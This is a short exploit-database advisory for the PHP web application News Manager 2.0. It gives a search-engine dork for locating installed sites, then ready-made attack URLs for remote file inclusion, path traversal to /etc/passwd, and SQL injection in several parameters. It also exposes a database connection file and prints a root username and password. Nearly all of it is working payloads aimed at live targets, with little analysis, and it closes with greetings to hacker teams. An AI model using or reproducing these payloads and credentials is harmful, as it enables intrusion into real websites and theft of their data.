newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection

Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2008-05-15


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

News Manager 2.0 Multiple Vulnerabilities
Script : http://superb-east.dl.sourceforge.net/sourceforge/newsrssmanager/newsmanager2.0.zip
Dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten"
1- Remote File Include Vulnerability
/ch_readalso.php?read_xml_include=http://localhost/020.txt
2- Remote File Disclosure Vulnerability
/attachments.php?id=../../../../../../../../../../../../../etc/passwd
/login/attachments.php?id=
3- Remote SQL Injection Vulnerabilities
/list_tagitems.php?pid=-41[SQL]
/advsearch.php?lang='[SQL]
/archive.php?lang='[SQL]
/index.php?lang='[SQL]
4- Remote Permission Bypass Vulnerability
/db/connect_str.php
You Can Get Username Of db & Pass & Name .. As 
mysql||localhost||newsmanager||root||mahmood4li
5- You Can Get PHPINFO From 
/login/info.php
Thanx To : Tryag-Team & HaCkeR_EgY & InjEctOr5 TeaM & All Muslims HaCkeRs   :) 

# milw0rm.com [2008-05-15]